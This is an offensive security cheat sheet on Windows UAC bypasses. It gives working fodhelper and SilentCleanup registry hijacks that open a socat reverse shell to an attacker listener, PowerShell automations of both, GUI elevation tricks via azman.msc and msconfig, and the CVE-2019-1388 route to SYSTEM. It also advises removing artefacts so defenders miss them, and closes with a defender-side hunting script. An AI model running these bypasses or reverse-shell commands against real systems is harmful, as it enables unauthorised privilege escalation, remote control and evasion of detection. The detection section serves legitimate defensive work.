UAC Windows Privilege Escalation

Last modified: Wed Dec 06 2023 00:00:00 GMT+0000 (Coordinated Universal Time)

Windows

UAC (User Account Control) is the Windows mechanism that runs an administrator's interactive processes with a filtered, Medium-integrity token and asks for consent before handing out the full High-integrity token. A UAC bypass obtains that High-integrity token without the prompt. It is only useful for a user who is already a member of the local Administrators group; it is not a way to become one, and most of the tricks below stop working when UAC is set to "Always notify".

Automation

UACME is a tool that collects and automates a large number of known Windows UAC bypass methods, including the auto-elevating binary and registry hijack tricks described below.


Investigation

# Check the current user's integrity level (Mandatory Label).
# "Medium Mandatory Level" = standard (filtered) token, "High Mandatory Level" = elevated.
whoami /groups | findstr "Label"
whoami /groups | find "Label"
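Before picking a bypass it helps to know whether one can work at all: the user must be in Administrators with a filtered token, and UAC must not be at "Always notify". The following PowerShell script is an added example (not from the original page) that reads both facts from the current session; the policy value names are the real ones under HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System, and the interpretation of ConsentPromptBehaviorAdmin follows the standard UAC slider mapping.

```powershell
# Added example, not part of the original page: enumerate the UAC posture of the
# current session before trying a bypass. Run it from a normal (Medium-integrity)
# PowerShell prompt of the user you are working as.

# 1. Integrity level and Administrators membership of the current token.
#    `whoami /groups /fo csv` yields the columns "Group Name","Type","SID","Attributes".
$groups = whoami /groups /fo csv | ConvertFrom-Csv
$label  = ($groups | Where-Object { $_.SID -like 'S-1-16-*' }).'Group Name'   # Mandatory Label\...
$admins = $groups | Where-Object { $_.SID -eq 'S-1-5-32-544' }               # BUILTIN\Administrators

"Integrity level : $label"
if (-not $admins) {
    "Not a member of Administrators: a UAC bypass will not help, look for another privesc vector."
} elseif ($admins.Attributes -match 'deny only') {
    # A filtered (split) token carries Administrators as "Group used for deny only".
    "Member of Administrators with a filtered token: a UAC bypass is the right tool."
} else {
    "Administrators is enabled on this token: already elevated, no bypass needed."
}

# 2. UAC policy. Auto-elevating Microsoft binaries (fodhelper, msconfig, mmc, ...) are
#    only honoured at the default level (ConsentPromptBehaviorAdmin = 5). Value 0 means
#    elevation is silent anyway; every other value prompts for each elevation.
$pol = Get-ItemProperty 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System'
"EnableLUA                  : $($pol.EnableLUA)"
"ConsentPromptBehaviorAdmin : $($pol.ConsentPromptBehaviorAdmin)"
"PromptOnSecureDesktop      : $($pol.PromptOnSecureDesktop)"
"FilterAdministratorToken   : $($pol.FilterAdministratorToken)"   # empty/0: built-in Administrator is never filtered

if ($pol.EnableLUA -eq 0) {
    'UAC is disabled (EnableLUA = 0): no bypass needed.'
} else {
    switch ($pol.ConsentPromptBehaviorAdmin) {
        0       { 'UAC set to Never notify: elevation happens silently.' }
        5       { 'Default UAC level: auto-elevate bypasses (fodhelper, SilentCleanup, azman, msconfig) apply.' }
        default { 'UAC prompts for every elevation (e.g. Always notify): auto-elevate bypasses are blocked.' }
    }
}
```

The "Group used for deny only" attribute on BUILTIN\Administrators is the quickest tell that you are looking at a split token and that a bypass, rather than a different privilege escalation, is the next step.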

UAC Bypass

AZMAN.MSC (Authorization Manager)

Because mmc.exe auto-elevates for this console, every program spawned from it inherits the High-integrity token. This is a GUI-only technique and needs an interactive session.

  1. Open Authorization Manager by entering "azman.msc" in the Run dialog.
  2. Click Help and select Help Topics. The help window opens.
  3. In the help window, right-click and select View Source. Notepad opens (still elevated).
  4. In Notepad, select File → Open.
  5. In the Open dialog, set the file type to "All Files" and navigate to C:\Windows\System32.
  6. Right-click cmd.exe and select Open. Command Prompt opens.
  7. That Command Prompt runs at High integrity level. Confirm with whoami /groups | find "Label", or try cd C:\Users\Administrator, which a Medium-integrity process cannot enter even though the account is in Administrators.

Fodhelper (Features on Demand Helper)

Fodhelper (fodhelper.exe) manages the optional Windows features settings. It is a Microsoft-signed binary with autoElevate set in its manifest, so it starts at High integrity without a prompt, and it opens the ms-settings: protocol. The handler for that protocol is looked up under HKCU\Software\Classes first, which the current user can write, so the command stored there runs in fodhelper's elevated context.

First, start a listener on the local (attacking) machine to catch the incoming connection.

nc -lvnp 4444

On the remote Windows machine, add the subkey to the registry and execute fodhelper to get a reverse shell. The example assumes socat.exe has already been copied to C:\ on the target.

set REG_KEY=HKCU\Software\Classes\ms-settings\Shell\Open\command
set CMD="powershell -windowstyle hidden C:\socat.exe TCP:<local-ip>:4444 EXEC:cmd.exe,pipes"
# /v: Value name under the selected key.
# /d: Data to assign to the registry ValueName being added.
# /f: Force overwriting the existing registry entry without prompt.
# An empty DelegateExecute value makes the shell fall back to the key's (Default) command string.
reg add %REG_KEY% /v "DelegateExecute" /d "" /f
# Without /v, reg add sets the (Default) value, i.e. the command the ms-settings: handler runs.
reg add %REG_KEY% /d %CMD% /f & fodhelper.exe

We should get a shell running at High integrity level.

To check the IL, run the following command.

whoami /groups | find "Label"

Finally, remove the hijacked handler so the artefact is not left behind for defenders to find (the whole ms-settings key is deleted, since no legitimate software creates it under HKCU).

# /f: Forces the deletion without prompt
reg delete HKCU\Software\Classes\ms-settings\ /f
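The same hijack, done end-to-end from PowerShell, as an added example that is not part of the original page. Instead of the socat reverse shell it runs a local proof payload that records the integrity label of the elevated process, waits for the result, and removes the registry key in a finally block so cleanup happens even when the bypass fails. The payload string and the proof-file path are assumptions; replace them with whatever you actually want to run at High integrity.

```powershell
# Added example, not part of the original page: fodhelper.exe ms-settings handler
# hijack from PowerShell. Requires a user in Administrators with a filtered token,
# UAC below 'Always notify', and a 64-bit PowerShell (fodhelper.exe only exists in
# the 64-bit System32). $Payload and $Proof are assumptions for demonstration.

$KeyPath = 'HKCU:\Software\Classes\ms-settings\Shell\Open\command'
$Proof   = Join-Path $env:PUBLIC 'uac_proof.txt'
# The elevated child writes its own Mandatory Label line to the proof file.
$Payload = "powershell -WindowStyle Hidden -Command `"whoami /groups | findstr Label | Out-File -FilePath '$Proof'`""

try {
    # fodhelper (autoElevate=true) opens ms-settings:, and the per-user Classes hive is
    # consulted first. An empty DelegateExecute value makes the shell fall back to the
    # (Default) command string, which it runs in fodhelper's High-integrity context.
    New-Item -Path $KeyPath -Force | Out-Null
    New-ItemProperty -Path $KeyPath -Name 'DelegateExecute' -Value '' -PropertyType String -Force | Out-Null
    Set-ItemProperty  -Path $KeyPath -Name '(Default)' -Value $Payload

    Start-Process -FilePath "$env:SystemRoot\System32\fodhelper.exe" -WindowStyle Hidden

    # Give the elevated child up to 10 seconds to start and write the proof file.
    $deadline = (Get-Date).AddSeconds(10)
    while (-not (Test-Path $Proof) -and (Get-Date) -lt $deadline) { Start-Sleep -Milliseconds 250 }

    if (Test-Path $Proof) {
        Get-Content $Proof          # expect "Mandatory Label\High Mandatory Level ..."
    } else {
        'No proof file: the bypass did not fire (check UAC level and Administrators membership).'
    }
}
finally {
    # Remove the whole hijacked class and the proof file, whatever happened above.
    Remove-Item -Path 'HKCU:\Software\Classes\ms-settings' -Recurse -Force -ErrorAction SilentlyContinue
    Remove-Item -Path $Proof -Force -ErrorAction SilentlyContinue
}
```

Deleting the key in finally matters: a leftover HKCU\Software\Classes\ms-settings key is one of the most common indicators hunted for this technique, and it also hijacks the Settings app for the user until removed.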

Scheduled Task: Disk Cleanup

Start a listener on the local machine to receive the reverse connection.

nc -lvnp 4444

Add the entry to the registry. The SilentCleanup scheduled task runs %windir%\system32\cleanmgr.exe with the user's highest available privileges, and %windir% is expanded from the user's own environment, so a windir value under HKCU\Environment replaces the executable with an attacker-controlled command. The trailing &REM turns the remainder of the expanded command line (\system32\cleanmgr.exe and its arguments) into a comment.

reg add "HKCU\Environment" /v "windir" /d "cmd.exe /c C:\socat.exe TCP:<local-ip>:4444 EXEC:cmd.exe,pipes &REM " /f
# /run: Start the scheduled task immediately.
# /tn: Task name
# /I: Run the task immediately, ignoring any constraints (idle, AC power, etc.).
schtasks /run  /tn \Microsoft\Windows\DiskCleanup\SilentCleanup /I

Remember to delete the windir value from HKCU\Environment afterwards: a stale override breaks every later launch of cleanmgr and is an obvious artefact.
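An added PowerShell version of this technique (not part of the original page) that first checks the task is still in the shape the trick relies on, then sets the per-user windir override, runs the task, and restores the environment in a finally block. The proof payload and file path are assumptions; substitute the command you want run at High integrity.

```powershell
# Added example, not part of the original page: SilentCleanup %windir% hijack from
# PowerShell, with a pre-check and guaranteed cleanup. $Payload and $Proof are
# assumptions for demonstration.

$TaskPath = '\Microsoft\Windows\DiskCleanup\'
$TaskName = 'SilentCleanup'
$Proof    = Join-Path $env:PUBLIC 'uac_proof.txt'
# cmd.exe /c <our command> &REM <the rest of the task's command line becomes a comment>
# Keep the trailing space so that REM is followed by a delimiter after expansion.
$Payload  = "cmd.exe /c whoami /groups | findstr Label > $Proof &REM "

# Pre-check (read-only): the action must start with %windir% and the task must run
# with highest privileges, otherwise the override does not give us a High-IL process.
$task = Get-ScheduledTask -TaskPath $TaskPath -TaskName $TaskName
"Action   : $($task.Actions.Execute) $($task.Actions.Arguments)"   # expect %windir%\system32\cleanmgr.exe
"RunLevel : $($task.Principal.RunLevel)"                            # expect Highest
if ($task.Actions.Execute -notmatch '^%windir%' -or $task.Principal.RunLevel -ne 'Highest') {
    throw 'SilentCleanup is not in the expected shape on this build; pick another bypass.'
}

try {
    # The task runs as the logged-on user and builds its environment from the registry,
    # so a per-user windir (HKCU\Environment) wins over the system-wide one.
    Set-ItemProperty -Path 'HKCU:\Environment' -Name 'windir' -Value $Payload
    Start-ScheduledTask -TaskPath $TaskPath -TaskName $TaskName

    $deadline = (Get-Date).AddSeconds(10)
    while (-not (Test-Path $Proof) -and (Get-Date) -lt $deadline) { Start-Sleep -Milliseconds 250 }

    if (Test-Path $Proof) {
        Get-Content $Proof          # expect "Mandatory Label\High Mandatory Level ..."
    } else {
        'No proof file: the task did not run our command (check UAC level and group membership).'
    }
}
finally {
    # Always remove the override: a stale windir breaks cleanmgr and is a loud artefact.
    Remove-ItemProperty -Path 'HKCU:\Environment' -Name 'windir' -Force -ErrorAction SilentlyContinue
    Remove-Item -Path $Proof -Force -ErrorAction SilentlyContinue
}
```

The pre-check is worth keeping in any tooling: Microsoft has changed scheduled task definitions between builds, and a task whose action no longer begins with %windir%, or that no longer runs at RunLevel Highest, silently turns this from a bypass into a broken cleanmgr launch.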

System Configuration (msconfig)

msconfig.exe is another auto-elevating Microsoft binary; tools launched from its Tools tab inherit its High-integrity token.

  1. Open System Configuration by entering "msconfig" in the Run dialog.
  2. Go to the Tools tab, select Command Prompt, then click Launch.
  3. The Command Prompt runs at High integrity level; confirm with whoami /groups | find "Label".

Abuse UAC Windows Certificate Dialog (CVE-2019-1388)

The UAC consent dialog (consent.exe, which runs as SYSTEM) lets the user inspect the publisher's certificate and follow a hyperlink from it. The browser that opens is a child of consent.exe and therefore also runs as SYSTEM, which is more than the High-integrity token the other techniques on this page give. This only applies to hosts missing the November 2019 security updates that fixed CVE-2019-1388.

  1. Run hhupd.exe (an old Microsoft-signed binary whose certificate carries an "Issued by" URL). The User Account Control window opens.

  2. Click "Show more details", then click "Show information about the publisher's certificate".

  3. On the certificate's General tab, click the "Issued by" link. A web browser (Internet Explorer) opens as SYSTEM.

  4. In the browser, open the Tools (gear) menu and select File → Save as....

  5. In the Save As dialog's file name field, enter the full path to cmd.exe and press Enter:

    "c:\Windows\System32\cmd.exe"

Command Prompt now runs as NT AUTHORITY\SYSTEM; confirm with whoami.
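Added, not part of the original page: a defender-side hunt for the registry artefacts the fodhelper and SilentCleanup techniques above leave behind when an attacker skips the cleanup steps. It walks every loaded user hive under HKEY_USERS rather than only HKCU, so it covers other logged-on users; it needs an elevated prompt to read hives other than your own.

```powershell
# Added example, not part of the original page: hunt loaded user hives for the two
# per-user UAC-bypass artefacts described above. Run elevated to read all hives.

$Findings = foreach ($hive in Get-ChildItem 'Registry::HKEY_USERS' |
                     Where-Object { $_.PSChildName -match '^S-1-5-21-\d+-\d+-\d+-\d+$' }) {
    $sid = $hive.PSChildName   # skips the *_Classes hives and well-known SIDs

    # 1. ms-settings handler under the user's Classes: no legitimate software registers
    #    this per user, so its mere presence is suspicious; DelegateExecute confirms intent.
    $cmdKey = "Registry::HKEY_USERS\$sid\Software\Classes\ms-settings\Shell\Open\command"
    if (Test-Path $cmdKey) {
        $p = Get-ItemProperty $cmdKey
        [pscustomobject]@{
            SID             = $sid
            Technique       = 'fodhelper ms-settings hijack'
            Evidence        = $p.'(default)'
            DelegateExecute = ($null -ne $p.PSObject.Properties['DelegateExecute'])
        }
    }

    # 2. A user-level windir: the genuine value lives only in the system environment
    #    (HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Environment).
    $userEnv = Get-ItemProperty "Registry::HKEY_USERS\$sid\Environment" -ErrorAction SilentlyContinue
    if ($userEnv -and $userEnv.PSObject.Properties['windir']) {
        [pscustomobject]@{
            SID             = $sid
            Technique       = 'SilentCleanup windir override'
            Evidence        = $userEnv.windir
            DelegateExecute = $null
        }
    }
}

if ($Findings) { $Findings | Format-Table -AutoSize }
else           { 'No UAC-bypass registry artefacts found in loaded user hives.' }
```

This is a point-in-time check, and the page's own cleanup steps defeat it, so pair it with real-time telemetry: Sysmon registry events (Event ID 12/13) on the ms-settings\Shell\Open\command and HKCU\Environment\windir paths, and process-creation events where fodhelper.exe or cleanmgr.exe's parent spawns an unexpected child at High integrity.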